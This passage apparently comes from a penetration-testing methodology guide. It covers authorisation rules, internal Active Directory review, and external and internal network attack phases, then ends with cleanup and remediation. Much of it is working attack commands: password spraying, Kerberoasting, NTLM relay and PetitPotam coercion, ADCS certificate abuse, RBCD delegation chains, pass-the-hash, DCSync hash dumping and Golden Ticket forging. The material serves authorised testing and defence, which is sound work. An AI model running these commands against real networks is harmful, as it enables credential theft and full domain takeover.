snmpwalk -v2c -c public 10.10.0.254
        

Linux/Unix-Specific Checks

Kernel version and known CVEs (Dirty Pipe CVE-2022-0847, etc.)
Installed packages vs. CVE database (authenticated scan)
SSH configuration: PermitRootLogin, PasswordAuthentication, key management
Cron jobs and scheduled tasks running as root
World-writable files in critical paths (/etc, /usr)
SUID/SGID binaries — non-standard setuid binaries
NFS exports — shared with insecure options (no_root_squash)

Active Directory Configuration Review

CRITICAL — AD HYGIENE ASSESSMENT ▼

High-Risk AD Configurations to Identify

Kerberoastable accounts: User accounts with SPNs set — list them, report count and privilege level. HIGH RISK if service account is in privileged group.
AS-REP Roastable accounts: DONT_REQ_PREAUTH set — identify accounts. HIGH RISK if any are privileged accounts.
Unconstrained delegation: Computers/users with TrustedForDelegation = True — any machine with this can be used for full domain compromise if attacker gains control
Constrained delegation without protocol transition: msDS-AllowedToDelegateTo set
RBCD misconfigurations: msDS-AllowedToActOnBehalfOfOtherIdentity set on sensitive computers
ADCS vulnerable templates: Certificate templates with dangerous settings (ESC1–ESC8) — Certipy find with -vulnerable flag
Pre-Windows 2000 compatible access group: Contains Authenticated Users/Everyone — major risk
Machine Account Quota: Default is 10 — any user can create 10 computer accounts. Should be 0.

AD Password & Authentication Policy

Default Domain Password Policy: minimum length, complexity, history, lockout
Fine-Grained Password Policies (PSO) — verify they apply to service and privileged accounts
Account Lockout Policy — threshold and observation window
Protected Users group membership — privileged accounts should be members
Privileged Access Workstations (PAW) deployment status
Administrative tiering model implementation (Tier 0/1/2)
NTLM v1 allowed? (check LmCompatibilityLevel GPO setting — should be 5)
Anonymous LDAP bind permitted? (allows unauthenticated AD enumeration)
NULL session on DCs? (legacy but still worth checking)

ADCS Review Checklist (VA Mode — Find Only)

ESC1: Template allows SAN specification by requestor + client auth EKU
ESC2: Template with Any Purpose EKU or no EKU
ESC3: Certificate Request Agent template abuse
ESC4: Vulnerable certificate template ACL (GenericWrite / WriteDACL)
ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 flag set on CA
ESC8: NTLM relay to AD CS HTTP enrollment endpoint (Web Enrollment enabled)
CA web enrollment endpoint accessible over HTTP (not HTTPS)
Overly permissive enrollment rights on sensitive templates

Reporting, Exclusions & What NOT to Do

FINAL DELIVERABLE ▼

Internal VA Report — Additional Requirements

Asset inventory table — all discovered hosts with OS, services, criticality classification
Network segmentation map — actual vs. intended (gap analysis)
Active Directory attack path diagram (BloodHound output — summarised, not raw)
ADCS vulnerability findings mapped to ESC categories
Patch gap analysis — % of hosts per OS with critical patches missing
LAPS deployment gap — computers without LAPS
Privileged account audit — stale/excess privileged accounts
Remediation roadmap with asset owner assignments

Internal VA — Absolute Prohibitions

DO NOT run brute-force modules during VA — account lockout risk
DO NOT use BloodHound collection methods that trigger excessive LDAP queries (avoid "All" collection — use "DCOnly" + specific modules)
DO NOT attempt to authenticate with discovered credentials or hashes
DO NOT modify any AD objects, GPOs, users, group memberships, or ACLs
DO NOT access file share contents beyond confirming accessibility
DO NOT run DoS/stress tests against internal services
DO NOT scan OT/SCADA segments without explicit written approval AND engineering team physically present
DO NOT retain Domain Admin credentials or scan account passwords beyond the engagement period
DO NOT share BloodHound data or internal network topology with unauthorised parties

Module 03 // Active Exploitation // RoE Mandatory

External Network Penetration Test

Adversarial simulation of a real-world threat actor attacking the organisational perimeter from the internet. Involves active exploitation of vulnerabilities, credential attacks, and establishing an initial external foothold. Requires signed Rules of Engagement before ANY exploitation activity.

ROE MANDATORY ACTIVE EXPLOITATION MITRE ATT&CK NIST SP 800-115 CERT-In PHASE 2

Phases

80+

Techniques

30+

Tools

🔴

Legal Prerequisites — Zero Tolerance Policy

No written, signed RoE = absolute stop. Every single exploitation technique listed in this module constitutes a criminal offence under IT Act 2000 (India), CFAA (US), and CMA (UK) without explicit written authorisation. The RoE must specifically list permitted techniques, exact IP ranges, testing windows, emergency contacts, and out-of-scope declarations. Verbal approval is legally worthless.

RoE & Scope Definition — External PT

LEGAL GATE — MUST COMPLETE ▼

📋 External PT — Minimum RoE Requirements

Written authorisation signed by asset owner (CISO/CIO minimum; board-level for critical infrastructure)
Exact CIDR ranges in scope (not "our entire IP space" — explicit list required)
Individual out-of-scope IPs documented (especially shared infrastructure, co-location neighbours)
Permitted attack types explicitly listed (CVE exploitation, credential spraying, phishing if scoped, etc.)
Explicitly PROHIBITED techniques listed (DDoS, destructive payloads, ransomware simulation)
Testing window: specific dates, hours, time zones
Maximum number of failed authentication attempts per account (lockout risk management)

Emergency abort procedure — who calls halt and how
24/7 reachable escalation contact (not just email)
SOC/SIEM awareness clause (aware = purple team; unaware = black box — must be documented)
Cloud provider notification compliance (AWS/Azure/GCP testing notification forms submitted)
ISP/CDN/hosting provider notification where shared infrastructure exists
Data handling: prohibition on exfiltrating real data, evidence destruction post-engagement
Jurisdiction and governing law clause

✓ Typically IN SCOPE — External PT

All internet-facing IP ranges in the signed authorisation document
Exploitation of CVEs in identified services (within defined version ranges)
Credential attacks: password spraying against VPN, OWA, O365, Citrix, RDP (with lockout limits)
Default credential exploitation on exposed services
SSL/TLS vulnerability exploitation (Heartbleed, POODLE) — on test instances
DNS zone transfer exploitation (using revealed data for attack planning)
Subdomain takeover exploitation (if finding exists)
Open SMTP relay abuse for phishing payload delivery (if phishing is in scope)
Web application exploitation of internet-facing applications (covered in separate web app PT)
C2 infrastructure establishment after initial foothold
Firewall/IPS evasion techniques (if explicitly permitted in RoE)

✗ ALWAYS OUT OF SCOPE — External PT

IP ranges belonging to third parties, ISPs, hosting neighbours — scanning or attacking these is a criminal offence
Destructive payloads — wiper malware, ransomware, anything that destroys data
DDoS/DoS attacks (unless in a highly controlled maintenance window with explicit signed approval)
BGP hijacking without ISP-level coordination and approval
Attacking third-party SaaS services the client uses (O365 infrastructure itself is Microsoft's — only client tenant is in scope)
Social engineering without explicit social engineering clause in RoE
Physical security attacks without explicit physical clause in RoE
Accessing, downloading, or exfiltrating actual customer data
Any IP not in the explicit scope list — even if you believe it belongs to the client

Reconnaissance & Target Intelligence (PT Level)

MITRE ATT&CK: TA0043 ▼

PT-level recon builds on VA findings but goes deeper — the goal is building an attack map, not just an asset list. Every piece of intelligence is evaluated for its offensive utility.

Intelligence Goals for PT Recon

Identify all exploitable entry points — service versions with known CVEs, default creds, misconfigs
Build email username lists for credential spraying (linkedin2username, hunter.io, PhoneBook.cz)
Identify email format convention (first.last@, flast@, etc.)
Find exposed credentials in breach databases (dehashed, breach-parse)
Identify technology stack for targeted exploit selection
Map cloud infrastructure for cloud-specific attacks
Find exposed .git directories or code repositories with credentials
Identify all authentication portals (VPN, OWA, O365, Citrix, RDP, ADFS, SSO)

# LinkedIn user enumeration → username wordlist
python3 linkedin2username.py -u attacker@gmail.com
  -p 'LIpassword' -c "Target Organisation"

# Git secrets scanning in public repos
gitleaks detect --source ./cloned-repo --report-format json
trufflehog github --org=targetorg --json

# Exposed .git directory
git-dumper https://target.com/.git ./dumped-repo
        

Attack Surface Priority Map

P0 CRITICAL: RCE CVEs (known exploits) in internet-facing services
P0 CRITICAL: Default credentials on VPN/RDP/admin panels
P1 HIGH: Password spray targets (OWA/O365/VPN)
P1 HIGH: Exposed credentials from breach databases
P1 HIGH: Subdomain takeover candidates
P2 MEDIUM: SSL/TLS vulnerabilities (older CVEs)
P2 MEDIUM: Open SMTP relay (phishing vector)
P3 LOW: Information disclosure findings

Bypassing Perimeter Controls

Cloudflare bypass — find origin IP via history (CloudUnflare, Censys, Shodan)
WAF fingerprinting via error responses and header analysis
WAF bypass payloads (if web app in scope)
Rate limiting bypass — IP rotation via Burp IPRotate, Fireprox, AWS Lambda
Geoblocking bypass via cloud exit nodes in permitted regions

Initial Access — External Exploitation Techniques

MITRE ATT&CK: TA0001 ▼

CVE Exploitation (Service Exploitation)

RCE-as-a-feature: Jenkins (script console), Serv-U, GitLab CE/EE, Confluence (CVE-2023-22515, CVE-2022-26134), Exchange ProxyLogon/ProxyShell
Citrix (NetScaler ADC): CVE-2023-4966 (Bleed), CVE-2023-3519 — unauthenticated RCE
Fortinet SSL VPN: CVE-2022-40684, CVE-2023-27997 — pre-auth heap overflow/bypass
Ivanti Connect Secure: CVE-2024-21887, CVE-2023-46805 — auth bypass + RCE chain
MOVEit Transfer: CVE-2023-34362 — SQLi + RCE
OpenSSH regreSSHion: CVE-2024-6387 (glibc systems)
Metasploit: select module, set RHOSTS, verify version before exploit
Always verify patch status before attempting CVE — prevents false engagement

# Metasploit — structured exploit workflow
msfconsole
msf> search CVE-2023-4966
msf> use exploit/multi/handler
msf> set RHOSTS 203.0.113.10
msf> set LHOST YOUR_IP
msf> check  # ALWAYS verify before exploit
msf> exploit
        

Credential-Based Attacks

⚠

Lockout Management: Password spraying MUST be performed with awareness of the target's lockout policy. Spray 1 password per account per 30–60 minutes minimum. Coordinate lockout thresholds with client — exceeding lockout causes business disruption and is outside VA/PT scope. Confirm lockout policy in RoE.

O365 / Azure AD spraying: TREVORspray (lockout-aware), MSOLSpray, CredMaster
OWA (Exchange): Metasploit scanner/http/owa_login, CredMaster OWA plugin
Citrix spraying: CredMaster Citrix plugin
VPN spraying: Fortinet, Cisco, Palo Alto portal forms — CredMaster FortinetVPN plugin
O365 user enumeration (no auth): CredMaster O365Enum, AADInternals
IP rotation for spraying: Fireprox (AWS Lambda), Burp IPRotate, ProxyCannon
MFA bypass techniques: MFASweep (detect gaps), real-time phishing (Evilginx), legacy auth protocols (SMTP Auth, IMAP, MAPI)

# TREVORspray — O365 password spraying (lockout-aware)
trevorspray -e users.txt --passwords "Summer2024!"
  --delay 30 --no-current-ip
  --ssh ubuntu@relay1.your-infra.com

# CheckPoint VPN spraying
python3 checkpointSpray.py -t vpn.target.com
  -u users.txt -p passwords.txt --delay 30
        

Specific Attack Vectors — External PT

🔑 VPN — IKE Aggressive Mode

IKEv1 Aggressive Mode sends PSK hash without authentication
Capture hash with ike-scan --aggressive
Crack PSK offline with hashcat/john
Use PSK to authenticate to VPN
IKEv2 does not have this vulnerability

ike-scan --aggressive vpn.target.com
hashcat -m 5300 ike_hash.txt wordlist.txt
          

📨 Open SMTP Relay

Identify open relay via SMTP RCPT TO test
Exploit for spoofed email delivery (if phishing in scope)
Use for brand impersonation demonstration
Report SPF/DKIM/DMARC bypass ability

# Test for open relay
nmap --script smtp-open-relay -p 25 mail.target.com
          

🌐 Web App Vector

SQLi exploitation to confirm RCE or data access
RCE via deserialization (Java, .NET, PHP)
SSRF to access internal services / cloud metadata
File upload web shell deployment
Authentication bypass on login portals
IIS-specific: Tilde shortname enumeration, ASPNET_CLIENT

☁ Cloud Perimeter Attacks

AWS S3 public bucket access — data retrieval
Exposed AWS access keys in public code repos → account compromise
Azure blob public access → sensitive data exposure
Azure AD enumeration (AADInternals) for user/tenant intel
Cloud metadata SSRF (169.254.169.254 / 169.254.170.2)
Kubernetes API server unauthenticated access

🛡 Firewall/IDS Evasion

TCP fragmentation to bypass signature-based IDS
Packet timing manipulation (-T1/-T2 in Nmap)
Decoy scanning (nmap -D) to obscure source
Source port manipulation (--source-port 53/80)
SSL/TLS tunnelling for C2 (HTTPS/DNS over HTTPS)
Protocol tunnelling: DNS, ICMP, HTTP tunnels for C2

📱 MFA/2FA Bypass

Legacy authentication protocols (SMTP, IMAP, MAPI) bypass modern MFA
Evilginx2 — real-time phishing proxy (adversary-in-the-middle)
MFA fatigue — flood push notifications until user accepts
OAuth token theft via open redirect or CSRF
SIM swapping (requires RoE clause + carrier coordination)
Recovery code / backup code abuse

Post-Exploitation — Foothold Maintenance & Pivoting

MITRE ATT&CK: TA0004, TA0007 ▼

After External Foothold — What to Do

Establish C2 channel (Cobalt Strike, Sliver, Havoc, Metasploit multi/handler)
Document exact access level achieved — standard user, local admin, SYSTEM/root
Identify local network from compromised host — new internal IP ranges now visible
Check for internal network routing from DMZ host — pivot opportunity
Harvest local credentials: SAM database, LSA secrets (if local admin)
Identify domain membership status of compromised host
Check for sensitive files in standard locations (C:\Users\, /home/, /opt/)
Search for stored credentials in config files, environment variables, browser profiles
Identify running processes and installed software

Pivoting from External to Internal

🔴

Scope Boundary: If a compromised external host has routes to the internal network, pivoting into the internal network requires explicit RoE coverage. Many external PT engagements have scope limited to the internet-facing perimeter. Confirm whether internal pivoting is in scope before proceeding.

Port forwarding via compromised host (SSH tunnelling, Chisel, Ligolo-ng)
SOCKS proxy via C2 agent for transparent internal access
DNS-based pivoting if internal DNS resolves internal hostnames
VPN credential use from discovered creds to access internal network directly

Demonstrable Impact (Objectives)

Screenshot of access to target system/data (without exfiltrating real data)
Proof of access to internal network from external position
Credential harvesting evidence (hash format only, not plaintext)
Documentation of attack chain from start to impact (MITRE ATT&CK mapped)
Clean up: remove all artifacts, reverse all configuration changes, terminate all sessions

Cleanup, Remediation & PT Reporting

FINAL DELIVERABLE ▼

Mandatory Cleanup Steps (Before Report)

Remove ALL persistence mechanisms established during test (backdoors, new accounts, scheduled tasks, cron jobs, registry keys)
Remove all tools, scripts, and binaries deployed on target systems
Terminate all C2 connections and decommission C2 infrastructure
Delete any web shells deployed on target web servers
Reverse any configuration changes made during exploitation
Remove any test files created in accessible storage locations
Confirm cleanup with client IT team — they should verify no residual artifacts
Document all cleanup actions with timestamps

External PT Report — Required Sections

Executive Summary: Attack narrative in business terms, access achieved, business impact, risk headline
Attack Chain Diagram: Visual showing steps from initial recon to final impact (MITRE ATT&CK mapping)
Scope & RoE Reference: Exact scope tested, testing window, tester details
Methodology: Phases, tools used, techniques employed
Findings & Evidence: Each vulnerability exploited, with screenshots, command outputs, CVE references, CVSS scores
Demonstrated Impact: What the attacker could have done in a real attack (without including actual exfiltrated data)
Remediation Recommendations: Per finding, prioritised, actionable
Appendices: Full tool outputs, scan results, timeline log

Module 04 // Full Adversarial Simulation // Highest Risk Engagement

Internal Network Penetration Test

Simulation of a threat actor who has achieved initial access — insider threat, breached endpoint, or pivoted from external. Full Active Directory attack lifecycle: from initial foothold through privilege escalation, lateral movement, to domain dominance. This is the most technically complex and highest-risk engagement type.

ROE MANDATORY FULL EXPLOITATION MITRE ATT&CK v14 AD ATTACK CHAIN BOARD LEVEL APPROVAL

Phases

100+

Techniques

40+

Tools

🔴

Internal PT — Maximum Risk Engagement

Internal network PT involves attacks on Active Directory, NTLM relay, credential extraction, lateral movement, and domain controller compromise. These techniques, if executed incorrectly or without proper authorisation, can cause catastrophic business disruption — account lockouts for the entire domain, DC instability, or data loss. Board/CIO-level authorisation is the minimum standard. Production domain testing requires a verified rollback plan and change management approval. Consider staging environment testing as default; production only with explicit RoE clause and IR team standing by.

RoE & Scope — Internal PT

LEGAL GATE — NON-NEGOTIABLE ▼

📋 Internal PT — Enhanced RoE Requirements (Beyond External PT Baseline)

CISO + CIO + Legal sign-off minimum (board level for critical systems)
Active Directory domain name(s) and forest structure explicitly defined in scope
Explicit approval for each technique category: Kerberoasting, NTLM relay, DCSync, Golden Ticket, etc.
Production vs. staging/non-prod environment explicitly declared
If production: verified backup of NTDS.dit and AD state taken immediately before test
Change management ticket raised and approved for testing window
IR team on standby during test (or notified of test window)
Rollback plan documented and tested for any destructive actions

Domain Controller IPs explicitly listed — DC attacks are highest risk
Tier 0 / Tier 1 systems explicitly in or out of scope
Maximum failed authentication attempts per account type (user/admin/service)
Explicit prohibition on any technique that could cause domain-wide outage (e.g., wrong use of DCSync or ZeroLogon)
Data handling: no exfiltration of NTDS.dit, no retention of password hashes beyond engagement
Post-test: secure deletion of all extracted credentials, hashes, and certificates
Tester must have IR communication channel open throughout engagement
Emergency stop triggers clearly defined (e.g., if SOC detects and responds, test pauses)

✓ Typically IN SCOPE — Internal PT

All internal IP ranges in signed authorisation
Active Directory attacks within the in-scope domain(s)
Kerberoasting and AS-REP Roasting against in-scope domain
NTLM relay attacks within in-scope network segments
Credential spraying against internal services (RDP, SMB, WinRM, SSH)
Pass-the-Hash and Pass-the-Ticket with captured credentials
Lateral movement to in-scope hosts
DCSync against in-scope domain controllers
ADCS exploitation (ESC1–ESC8) in in-scope domains
BloodHound-mapped attack path execution
Persistence establishment (with documented cleanup)

✗ ALWAYS OUT OF SCOPE — Internal PT

ZeroLogon (CVE-2020-1472) against PRODUCTION DCs — causes DC password reset, extremely dangerous
Any technique that could cause domain-wide account lockouts
Modifying or deleting production AD objects, OUs, or GPOs permanently
Wiper/ransomware simulation without explicit, isolated, and approved test environment
Physical extraction of NTDS.dit from production domain controllers
OT/SCADA/ICS systems without dedicated engineering supervision
Disabling or tampering with security monitoring/AV/EDR without explicit approval
Production database content access beyond what is needed to prove impact
Systems outside the signed scope — even adjacent systems in the same org
Creating new Domain Admin accounts without documenting and immediately removing

Internal Reconnaissance & AD Enumeration

MITRE ATT&CK: TA0007 ▼

Network & AD Discovery

BloodHound + SharpHound: Map entire AD attack graph — identifies shortest path to Domain Admin
CrackMapExec (CME) / NetExec: Host discovery, SMB enumeration, user enumeration
ldapsearch / ldeep / windapsearch: LDAP queries — users, groups, computers, GPOs, SPNs
Enum4linux-ng: Comprehensive SMB/LDAP/NFS enumeration
Certipy find: ADCS certificate template enumeration, ESC identification
sccmhunter / SharpSCCM: SCCM presence and configuration (NAA creds, deployment targets)
adidnsdump: DNS record dumping via ADIDNS
Identify all domain trusts (parent-child, cross-forest, external)

# BloodHound — full collection
bloodhound-python -u lowprivuser -p 'Password'
  -d corp.local -ns 10.10.0.1
  -c All

# NetExec — SMB host discovery and enumeration
nxc smb 10.10.0.0/24 -u user -p pass
  --shares --users --groups --pass-pol

# ADCS vulnerability discovery
certipy find -u user@corp.local -p pass
  -dc-ip 10.10.0.1 -vulnerable -stdout
        

Key Enumeration Targets

All Domain Controllers and their roles (PDC Emulator, RID Master, etc.)
All members of Domain Admins, Enterprise Admins, Schema Admins
All accounts with SPNs set (Kerberoasting candidates)
All accounts with DONT_REQ_PREAUTH (AS-REP Roasting)
All computers with Unconstrained Delegation (TrustedForDelegation = True)
All computers/users with Constrained Delegation configured
ADCS certificate templates with dangerous configurations (ESC1–ESC16)
All ACL edges in BloodHound: GenericAll, GenericWrite, WriteDACL, WriteOwner, ForceChangePassword
LAPS enabled/disabled per OU
gMSA accounts and who can read their passwords
Machine Account Quota value
Pre-Windows 2000 compatible access group members

BloodHound Key Cypher Queries

// Shortest path to Domain Admins from owned
// (right-click any node → Mark as Owned first)
MATCH p=shortestPath((u:User {owned:true})-[*1..]->(g:Group
{name:"DOMAIN ADMINS@CORP.LOCAL"})) RETURN p

// Find all Kerberoastable users with DA path
MATCH (u:User {hasspn:true})
WHERE u.admincount=true RETURN u.name

// Find computers with unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true})
WHERE NOT c.name contains "DC" RETURN c.name
        

Credential Access

MITRE ATT&CK: TA0006 ▼

Kerberos Attacks

Kerberoasting: Any authenticated user can request TGS for any account with SPN. TGS is encrypted with service account's NT hash — crack offline. GetUserSPNs.py / Rubeus
AS-REP Roasting: Accounts with DONT_REQ_PREAUTH set allow unauthenticated hash retrieval. GetNPUsers.py / Rubeus asreproast
Targeted Kerberoasting: If you have GenericWrite on a user, set an SPN → Kerberoast → remove SPN
Shadow Credentials: If you have GenericWrite on a user/computer, add a key credential → authenticate with certificate → get NT hash

# Kerberoasting
GetUserSPNs.py corp.local/user:pass -dc-ip 10.10.0.1
  -request -outputfile kerberoast_hashes.txt
hashcat -m 13100 kerberoast_hashes.txt wordlist.txt
  --rules best64.rule

# AS-REP Roasting
GetNPUsers.py corp.local/ -usersfile users.txt
  -dc-ip 10.10.0.1 -format hashcat

# Shadow Credentials attack
certipy shadow auto -u user@corp.local -p pass
  -account targetuser -dc-ip 10.10.0.1
        

NTLM Relay Attacks

⚠

NTLM relay attacks can affect production authentication flows. Run Responder in Analyze mode first to observe traffic before poisoning. Confirm with client that the test window is acceptable for relay activity.

Responder + ntlmrelayx: Poison LLMNR/NBT-NS/mDNS, capture NTLM challenges, relay to other services
Relay to LDAP: Gain DCSync rights, add shadow credentials, set RBCD — if relay target has signing disabled
Relay to SMB: Execute commands on relay target (if SMB signing disabled)
Coercion techniques: PetitPotam, Coercer, DFSCoerce — force any domain computer to authenticate to attacker
mitm6: DHCPv6 poisoning → WPAD → NTLM relay → LDAP/LDAPS
WebDAV coercion: Coerce HTTP auth via WebClient service → relay to LDAP

# NTLM relay chain — SMB → LDAP for DCSync rights
# Terminal 1: Responder (turn off SMB/HTTP)
responder -I eth0 -A  # Analyze mode first
responder -I eth0 --lm

# Terminal 2: ntlmrelayx → LDAP
ntlmrelayx.py -t ldap://dc01.corp.local
  --escalate-user lowprivuser

# PetitPotam coercion → ESC8 chain
PetitPotam.py attacker-ip dc01.corp.local
        

DPAPI & Local Credential Extraction

DonPAPI / dploot: Extract DPAPI-protected secrets from domain machines with DA access (browser passwords, certificate stores, credential manager)
LAPS passwords: pyLAPS to extract LAPS passwords for local admin access to all LAPS-managed machines
gMSA passwords: gMSADumper — extract managed service account passwords if readable
Mimikatz / Rubeus: Extract credentials from LSASS on compromised hosts (if AV/EDR permits)

Privilege Escalation — AD Attack Chains

MITRE ATT&CK: TA0004 ▼

ACL Abuse Chains

ACL edges in BloodHound represent direct escalation paths. Each edge below can be exploited to escalate toward Domain Admin.

ACL Edge

Exploitation Method

Tool

GenericAllFull control — reset password, add to groups, add shadow creds, modify DACLbloodyAD, dacledit GenericWriteWrite any non-protected attribute — SPN for Kerberoast, shadow creds, logon scriptbloodyAD, certipy WriteDACLModify object's ACL — grant yourself DCSync, GenericAll, or other rightsdacledit, PowerView ForceChangePasswordReset target account password without knowing current passwordbloodyAD, net rpc WriteOwnerBecome object owner → grant yourself WriteDACL → GenericAllbloodyAD AddMemberAdd yourself/controlled account to privileged groupbloodyAD, net rpc

ADCS Exploitation Chains (ESC1–ESC8)

ESC1 (Direct DA): Template allows SAN specification + client auth EKU → request cert as DA → PKINIT → NT hash/TGT
ESC4 (Template Takeover): WriteDACL/GenericWrite on template → modify to ESC1 → exploit → restore
ESC6 (EDITF flag): CA has EDITF_ATTRIBUTESUBJECTALTNAME2 → any template becomes ESC1
ESC8 (NTLM Relay): Coerce DC to authenticate → relay to ADCS HTTP enrollment → get DC certificate → PKINIT → DCSync
ESC15 / EKUwu: Schema v1 template → inject arbitrary Application Policy EKU → cert for any user

# ESC1 — Request cert as Domain Admin
certipy req -u lowprivuser@corp.local -p pass
  -ca 'corp-CA' -template 'VulnerableTemplate'
  -upn administrator@corp.local
certipy auth -pfx administrator.pfx -dc-ip 10.10.0.1

# ESC8 — PetitPotam → ADCS relay → DCSync
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp
  --adcs --template DomainController
PetitPotam.py attacker-ip dc01.corp.local
        

Delegation Abuse Chains

Unconstrained Delegation: Compromise host with TrustedForDelegation=True → coerce DC to authenticate → extract DC TGT from LSASS → Pass-the-Ticket → DCSync
RBCD (Resource-Based Constrained Delegation): GenericWrite on target computer → write msDS-AllowedToActOnBehalfOfOtherIdentity → create machine account → S4U2Self → S4U2Proxy → admin TGS for target
Constrained Delegation (S4U2Proxy): msDS-AllowedToDelegateTo set → S4U2Self (get forwardable TGS) → S4U2Proxy → impersonate any user to allowed SPN

# RBCD attack chain
# Step 1: Create machine account
addcomputer.py corp.local/user:pass
  -computer-name EVIL$ -computer-pass EvilPass123!

# Step 2: Write RBCD on target
rbcd.py -action write -delegate-from EVIL$
  -delegate-to TARGET$ corp.local/user:pass

# Step 3: S4U chain to get admin TGS
getST.py corp.local/EVIL$:EvilPass123!
  -spn cifs/target.corp.local
  -impersonate administrator
  -dc-ip 10.10.0.1
        

GPO Abuse

GPO with Write Access: SharpGPOAbuse / GPOddity — add scheduled task / immediate task / logon script to GPO affecting target OU
Targeted GPO Scope: GPO linked to OU containing DCs = game over if you can write it

Trust Escalation (Child → Parent)

Own child domain → dump child krbtgt hash → Get child + parent domain SIDs → Craft Golden Ticket with Enterprise Admin SID (-519) injected → DCSync parent domain
RaiseChild.py (Impacket) automates child-to-parent escalation

# Child → Parent domain takeover (ExtraSID attack)
raiseChild.py -target-exec dc01.parentcorp.local
  childcorp.local/domainadmin:pass
        

Lateral Movement

MITRE ATT&CK: TA0008 ▼

Remote Execution Techniques

PsExec: SMB + ADMIN$ share → service execution → SYSTEM shell
WMIexec: WMI-based execution — slightly less noisy than PsExec
SMBexec: Pure SMB execution — no service install
COMexec: DCOM-based execution (MMC20.Application, ShellWindows)
evil-winrm: WinRM (5985/5986) — PowerShell remoting
xfreerdp: RDP with pass-the-hash (if NLA is not enforced)
atexec.py: Task Scheduler-based execution

# PsExec with NT hash (Pass-the-Hash)
psexec.py -hashes :nthash corp.local/administrator@10.10.0.50

# WMIexec
wmiexec.py -hashes :nthash corp.local/user@10.10.0.50

# evil-winrm — PowerShell remoting
evil-winrm -i 10.10.0.50 -u administrator
  -H nthash
        

Pass-the-Hash / Pass-the-Ticket

Pass-the-Hash (PtH): NT hash alone is sufficient for NTLM authentication — no password cracking needed
Pass-the-Ticket (PtT): Inject TGT/TGS from file or memory → Kerberos auth as that user
Pass-the-Certificate: PKINIT auth using stolen or forged certificate
Over-pass-the-Hash: Use NT hash to request a Kerberos TGT (converts NTLM auth to Kerberos)
Pass-the-Key: Kerberos AES key-based authentication (avoids NTLM entirely — evades NTLMv2 detections)

# Pass-the-Hash via CME
nxc smb 10.10.0.0/24
  -u administrator -H aad3b435b51404eeaad3b435b51404ee:nthash

# Pass-the-Ticket (inject TGT)
export KRB5CCNAME=./administrator.ccache
psexec.py -k -no-pass corp.local/administrator@dc01.corp.local
        

Domain Dominance — DCSync & Golden Ticket

MITRE ATT&CK: TA0006 T1003 ▼

🔴

DCSync & Domain Hash Extraction — Special Handling Required

DCSync extracts all domain password hashes from Active Directory. This includes the krbtgt account hash. Possession of the krbtgt hash provides permanent, near-undetectable access to the domain until the krbtgt password is rotated TWICE. Handle with extreme care. Do NOT exfiltrate NTDS.dit or hash dumps outside the client environment. Destroy all hash data at end of engagement per RoE.

DCSync Attack

DCSync replicates AD credentials using the DRSUAPI replication protocol. Requires DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights (default: Domain Admins, Enterprise Admins, DC accounts). Can be granted via WriteDACL abuse.

# DCSync — dump all domain hashes
secretsdump.py corp.local/domainadmin:pass
  -dc-ip 10.10.0.1 -just-dc-ntlm

# DCSync — target krbtgt only
secretsdump.py corp.local/domainadmin:pass
  -dc-ip 10.10.0.1 -just-dc-user krbtgt

# DCSync via granted rights (no DA)
secretsdump.py corp.local/user:pass
  -dc-ip 10.10.0.1 -just-dc-ntlm
 # (only if DCSync rights granted via dacledit abuse)
        

Golden & Diamond Tickets

Golden Ticket: Forge TGT using krbtgt hash → arbitrary user + group memberships → valid for 10 years if not rotated
Diamond Ticket: Modify PAC in legitimate TGT → much harder to detect than Golden Ticket
ExtraSID (Golden + Enterprise Admin): Inject Enterprise Admin SID (-519) into Golden Ticket → forest-wide admin access
Silver Ticket: Forge TGS using service account hash → access specific service without DC contact

# Golden Ticket
ticketer.py -nthash krbtgt_hash
  -domain-sid S-1-5-21-xxxx
  -domain corp.local
  -groups 512,519 administrator

# ExtraSID — cross-forest with Enterprise Admin SID
ticketer.py -nthash krbtgt_hash
  -domain-sid S-1-5-21-childSID
  -domain childcorp.local
  -extra-sid S-1-5-21-parentSID-519
  administrator
        

Cleanup, Remediation & Internal PT Reporting

MANDATORY — POST-ENGAGEMENT ▼

Cleanup Checklist — Internal PT

Remove all machine accounts created during RBCD/delegation attacks
Remove all shadow credentials (msDS-KeyCredentialLink) added during test
Remove all SPNs set on user accounts for targeted Kerberoasting
Revert all GPO modifications — restore to pre-test state and verify
Remove all ACL changes made to AD objects (DCSync rights, WriteDACL grants)
Remove all persistence mechanisms: scheduled tasks, logon scripts, registry run keys
Terminate all C2 agents and clean beacons from memory/disk
Securely delete all extracted hash dumps, Kerberos tickets, and certificates
Document all cleanup actions with timestamps for client verification
Client AD team should run comparison of AD state before/after to verify clean state

Internal PT Report — Required Sections

Executive Summary: Whether Domain Admin was achieved, estimated real attacker timeline, business impact severity
Attack Chain Diagram: Full kill chain from initial access to domain dominance, MITRE ATT&CK technique IDs mapped to each step
BloodHound Attack Paths: Include sanitised BloodHound graphs showing key attack paths
AD Security Findings: Kerberoastable accounts, delegation misconfigs, ADCS vulnerabilities, ACL abuses — each as a standalone finding with CVSS
Credential Exposure Impact: Summary of accounts compromised and their privilege level (no actual credential values)
Lateral Movement Map: Which hosts were accessed from which, showing blast radius
Remediation Roadmap: Short-term (patch critical vulns), medium-term (AD hardening), long-term (tiering model, PAW deployment)
AD Hardening Recommendations: Tiered administration model, Protected Users group, LAPS deployment, Credential Guard, WDAC policies

Key AD Remediation Actions

Enforce SMB signing on ALL hosts (Group Policy)
Disable LLMNR and NBT-NS organisation-wide (eliminates relay attack surface)
Deploy LAPS to all computers
Enable Protected Users group for all privileged accounts
Implement tiered administration model (Tier 0/1/2)
Rotate krbtgt password TWICE (post-engagement)
Review and remediate all ADCS vulnerable templates
Set Machine Account Quota to 0
Remove pre-Windows 2000 compatible access group from sensitive OUs
Enable Credential Guard on Tier 0 systems
Disable NTLM where possible; enforce NTLMv2 minimum
Implement SIEM alerting for DCSync, Golden Ticket, NTLM relay indicators